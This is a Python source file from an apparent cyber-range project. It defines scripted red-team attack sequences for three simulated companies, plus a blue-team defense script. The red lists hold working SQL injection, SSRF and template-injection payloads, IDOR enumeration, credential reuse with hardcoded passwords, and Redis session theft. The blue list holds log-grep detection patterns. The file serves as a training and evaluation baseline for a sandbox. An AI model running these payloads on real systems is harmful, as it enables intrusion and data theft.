Hugging Face's logo

Spaces:
abrown31
/
open-range
Runtime error

App Files Community
open-range / src /open_range /agents /solvers.py
Aaron Brown
Add episode CLI, synthetic data pipeline, NPC generalization, service manifest
f016eb7
raw
history blame contribute delete
10.6 kB
"""Baseline solver suite: scripted attack/defense sequences per tier.
Each solver extends ``ScriptedAgent`` with realistic command sequences
matching the topology and services defined in that tier's manifest.
These are not guaranteed to solve every Builder-generated mutation, but
they cover the *general* attack/defense pattern for the tier so that
evaluation runs have a non-trivial baseline to compare against.
Usage::
 from open_range.agents.solvers import get_solver
 red = get_solver(tier=1, role="red")
 blue = get_solver(tier=1, role="blue")
"""
from __future__ import annotations
from typing import Literal
from open_range.agents.replay_agent import ScriptedAgent
# =====================================================================
# Tier 1 Red solver (Meridian Health Partners, 8 hosts, 4 zones)
# =====================================================================
TIER1_RED_COMMANDS = [
 # Phase 1: External recon
 "nmap -sV -sC 10.0.1.0/24",
 "nmap -sV -sC 10.0.2.0/24",
 "nmap -sV -p 389,636 10.0.3.0/24",
# Phase 2: Web application enumeration
 "curl -s http://web/",
 "curl -s http://web/login",
 "curl -s http://web/search?q=test",
 "nikto -h http://web/ -Tuning 9",
# Phase 3: SQLi on search/login endpoints
 "curl -s \"http://web/search?q=test'+UNION+SELECT+NULL,username,password+FROM+users--\"",
 "curl -s \"http://web/search?q=test'+OR+1=1--\"",
 "curl -s \"http://web/login\" -d \"username=admin'--&password=x\"",
# Phase 4: Extract credentials from DB via SQLi or direct access
 "curl -s \"http://web/search?q='+UNION+SELECT+table_name,NULL,NULL+FROM+information_schema.tables--\"",
 "curl -s \"http://web/search?q='+UNION+SELECT+flag,NULL,NULL+FROM+flags.secrets--\"",
# Phase 5: Credential reuse and pivot to internal services
 "mysql -h db -u svc_backup -pbackup123 -e 'SHOW DATABASES'",
 "mysql -h db -u svc_backup -pbackup123 -e 'SELECT * FROM referral_db.patients LIMIT 5'",
 "mysql -h db -u admin -padmin123 -e 'SELECT * FROM flags.secrets'",
# Phase 6: IDOR on web API
 "curl -s http://web/api/users/1/profile",
 "curl -s http://web/api/users/2/profile",
 "curl -s http://web/api/users/3/profile",
# Phase 7: File server and LDAP enumeration
 "smbclient -L //files/ -N",
 "smbclient //files/contracts -N -c 'ls'",
 "ldapsearch -x -H ldap://ldap -b 'dc=meridianhealth,dc=local' '(objectClass=person)' uid",
# Phase 8: Flag submission (generic -- actual flag depends on mutation)
 "submit_flag FLAG{idor_chain_2_db}",
 "submit_flag FLAG{sqli_referral_db}",
]
class Tier1Solver(ScriptedAgent):
 """Baseline Red solver for Tier 1 (Meridian Health Partners).
 Attack pattern: nmap recon -> web enumeration -> SQLi/IDOR on
 portal -> credential pivot to MySQL -> flag capture.
 """
def __init__(self) -> None:
 super().__init__(commands=TIER1_RED_COMMANDS, fallback="echo done")
# =====================================================================
# Tier 2 Red solver (Pinnacle Financial Group, 10 hosts, 6 zones)
# =====================================================================
TIER2_RED_COMMANDS = [
 # Phase 1: External recon
 "nmap -sV -sC 10.0.1.0/24",
 "nmap -sV -p 22,80,443,25 10.0.1.0/24",
 "nmap -sV 10.0.2.0/24",
# Phase 2: Web portal enumeration
 "curl -s http://web/",
 "curl -s http://web/login",
 "curl -s http://web/legacy/",
 "nikto -h http://web/ -Tuning 9",
# Phase 3: Exploit web vuln for initial access
 "curl -s \"http://web/search?q='+OR+1=1--\"",
 "curl -s \"http://web/search?q='+UNION+SELECT+username,password,NULL+FROM+users--\"",
 "curl -s \"http://web/api/clients/1\"",
 "curl -s \"http://web/api/clients/2\"",
# Phase 4: Enumerate internal network from foothold
 "ssh -o StrictHostKeyChecking=no jumpbox 'nmap -sV 10.0.2.0/24'",
 "ssh -o StrictHostKeyChecking=no jumpbox 'nmap -sV 10.0.3.0/24'",
# Phase 5: Credential reuse to pivot
 "psql -h db -U svc_report -d client_portfolios -c '\\dt'",
 "psql -h db -U svc_etl -d client_portfolios -c 'SELECT * FROM clients LIMIT 5'",
 "mysql -h db -u svc_report -preport123 -e 'SHOW DATABASES'",
# Phase 6: Mail server exploitation
 "curl -s 'http://mail:25' --connect-timeout 5",
 "swaks --to admin@pinnaclefg.local --from test@external.com --server mail --header 'Subject: Test'",
# Phase 7: File server enumeration
 "smbclient -L //files/ -N",
 "smbclient //files/compliance -N -c 'ls'",
 "smbclient //files/hr -N -c 'ls'",
# Phase 8: Flag submission
 "submit_flag FLAG{pivot_via_jumpbox}",
 "submit_flag FLAG{credential_reuse_db}",
]
class Tier2Solver(ScriptedAgent):
 """Baseline Red solver for Tier 2 (Pinnacle Financial Group).
 Attack pattern: external recon -> web exploit -> jumpbox pivot ->
 credential reuse to DB -> mail/file enumeration -> flag.
 """
def __init__(self) -> None:
 super().__init__(commands=TIER2_RED_COMMANDS, fallback="echo done")
# =====================================================================
# Tier 3 Red solver (NovaStar Technologies, 16 hosts, 8 zones)
# =====================================================================
TIER3_RED_COMMANDS = [
 # Phase 1: External recon (broad scan)
 "nmap -sV -sC 10.0.1.0/24",
 "nmap -sV 10.0.2.0/24",
 "nmap -sV -p 80,443,8080,3000,9000 10.0.6.0/24",
# Phase 2: Web application recon
 "curl -s http://web/",
 "curl -s http://web/admin/",
 "curl -s http://web/api/v1/status",
 "curl -s https://partners.novastar.local/api/v1/health",
# Phase 3: Web exploit (SQLi, SSRF, SSTI)
 "curl -s \"http://web/search?q='+UNION+SELECT+NULL,username,password+FROM+auth_users--\"",
 "curl -s \"http://web/api/v1/fetch?url=http://cache:6379/\"",
 "curl -s \"http://web/api/v1/render?template={{config}}\"",
# Phase 4: Lateral movement via credentials
 "redis-cli -h cache KEYS '*'",
 "redis-cli -h cache GET session:admin",
 "ssh -o StrictHostKeyChecking=no jumpbox 'whoami'",
# Phase 5: CI/CD pipeline exploitation
 "ssh -o StrictHostKeyChecking=no jumpbox 'curl -s http://ci_cd:8080/'",
 "ssh -o StrictHostKeyChecking=no jumpbox 'curl -s http://ci_cd:8080/script'",
 "ssh -o StrictHostKeyChecking=no jumpbox 'curl -s http://devtools:3000/'",
# Phase 6: File server / LDAP / backup enumeration
 "smbclient -L //files/ -N",
 "smbclient //files/engineering -N -c 'ls'",
 "ldapsearch -x -H ldap://ldap -b 'dc=novastar,dc=local' '(objectClass=person)' uid",
# Phase 7: Database access
 "psql -h db -U svc_monitor -d novastar_app -c 'SELECT * FROM customers LIMIT 5'",
 "mysql -h db -u root -e 'SELECT * FROM flags.secrets'",
# Phase 8: Partner portal
 "curl -s https://partners.novastar.local/api/v1/orders",
 "curl -s https://partners.novastar.local/api/v1/keys",
# Phase 9: Privilege escalation and flag
 "ssh -o StrictHostKeyChecking=no jumpbox 'cat /var/backups/*.sql 2>/dev/null | grep FLAG'",
 "submit_flag FLAG{cicd_pipeline_rce}",
 "submit_flag FLAG{partner_api_key_leak}",
 "submit_flag FLAG{novastar_supply_chain}",
]
class Tier3Solver(ScriptedAgent):
 """Baseline Red solver for Tier 3 (NovaStar Technologies).
 Attack pattern: broad recon -> web exploit -> cache/session theft ->
 jumpbox pivot -> CI/CD exploit -> DB/file enumeration -> flag.
 """
def __init__(self) -> None:
 super().__init__(commands=TIER3_RED_COMMANDS, fallback="echo done")
# =====================================================================
# Blue solver (generic defense pattern, works across tiers)
# =====================================================================
BLUE_DEFENSE_COMMANDS = [
 # Phase 1: Check SIEM alerts
 "grep -rn 'ALERT\\|WARNING\\|CRITICAL' /var/log/siem/ 2>/dev/null | tail -50",
 "cat /var/log/siem/consolidated/alerts.log 2>/dev/null | tail -30",
# Phase 2: Grep logs for anomalies
 "grep -rn 'UNION\\|SELECT.*FROM\\|OR 1=1\\|--' /var/log/siem/web_access.log 2>/dev/null | tail -20",
 "grep -rn 'Failed password\\|Invalid user\\|authentication failure' /var/log/siem/ 2>/dev/null | tail -20",
 "grep -rn 'nmap\\|nikto\\|hydra\\|sqlmap' /var/log/siem/ 2>/dev/null | tail -20",
 "grep -rn '10.0.0.100\\|kali\\|attacker' /var/log/siem/ 2>/dev/null | tail -20",
# Phase 3: Submit findings for detected attacks
 "submit_finding Port scan detected: nmap SYN scan from external source against DMZ hosts",
 "submit_finding SQL injection attempt detected in web access logs targeting /search endpoint",
 "submit_finding Brute force SSH login attempts detected from external IP",
 "submit_finding Unauthorized LDAP queries from web server indicating possible LDAP injection",
# Phase 4: Apply patches / mitigations
 "iptables -A INPUT -s 10.0.0.100 -j DROP 2>/dev/null; echo 'Blocked attacker IP'",
 "check_services",
 "grep -rn 'smbclient\\|rpcclient' /var/log/siem/ 2>/dev/null | tail -10",
 "submit_finding SMB enumeration detected against internal file server from DMZ host",
]
class BlueSolver(ScriptedAgent):
 """Baseline Blue solver for defense across all tiers.
 Defense pattern: SIEM alert review -> log grep for attack patterns ->
 submit findings for detected threats -> apply mitigations.
 """
def __init__(self) -> None:
 super().__init__(commands=BLUE_DEFENSE_COMMANDS, fallback="check_services")
# =====================================================================
# Factory function
# =====================================================================
def get_solver(tier: int = 1, role: Literal["red", "blue"] = "red") -> ScriptedAgent:
 """Return the appropriate baseline solver for the given tier and role.
 Args:
 tier: Range tier (1, 2, or 3).
 role: ``"red"`` for attacker, ``"blue"`` for defender.
 Returns:
 A ``ScriptedAgent`` subclass instance pre-loaded with the
 appropriate command sequence.
 Raises:
 ValueError: If the tier or role is not recognized.
 """
 if role == "blue":
 return BlueSolver()
if role == "red":
 solvers = {
 1: Tier1Solver,
 2: Tier2Solver,
 3: Tier3Solver,
 }
 if tier not in solvers:
 raise ValueError(
 f"No Red solver for tier {tier}. Available tiers: {sorted(solvers.keys())}"
 )
 return solvers[tier]()
raise ValueError(f"Unknown role '{role}'. Must be 'red' or 'blue'.")